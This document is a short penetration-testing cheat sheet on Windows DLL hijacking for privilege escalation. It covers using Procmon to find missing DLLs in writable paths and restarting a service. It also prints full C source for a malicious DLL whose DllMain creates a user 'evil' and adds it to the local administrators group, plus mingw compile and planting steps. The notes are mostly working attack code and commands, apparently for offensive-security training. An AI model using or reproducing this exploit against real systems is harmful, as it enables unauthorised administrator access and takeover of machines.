# DLL/EXE Hijacking

## DLL/EXE Hijacking

* Run **Procmon** as administrator in rdp session
* Add filters
  * Result - is - NAME NOT FOUND - Include - click add
  * Path - ends with - .dll - include - click add
  * .apply and okay
* cmd.exe
  * sc stop dllsvc or servicename
    * or sc.exe stop dllsvc
  * sc start dllsvc
  * OR net stop \<servicename>
  * net start \<servicename>
* Now procmon will show more output
* Check for any .dll file path which is **writable**
* Now create same .dll file using **windows\_dll.c** script in kali

  \<aside> 👨‍💻 // For x64 compile with: x86\_64-w64-mingw32-gcc windows\_dll.c -shared -o output.dll // For x86 compile with: i686-w64-mingw32-gcc windows\_dll.c -shared -o output.dll

  \#include \<windows.h>

  BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL\_PROCESS\_ATTACH) { //or we can add a new user to administrator group system("cmd.exe /k net user evil pass1234 /add"); system("cmd.exe /k net localgroup administrators evil /add"); ExitProcess(0); } return TRUE; }

  \</aside>

  * x86\_64-w64-mingw32-gcc windows\_dll.c -shared -o \<vuln-dll>.dll
* transfer **.dll** to wrtable location found on **Procmon**
* sc stop dllsvc & sc start dllsvc
* now evil user has been added in administrator group
* List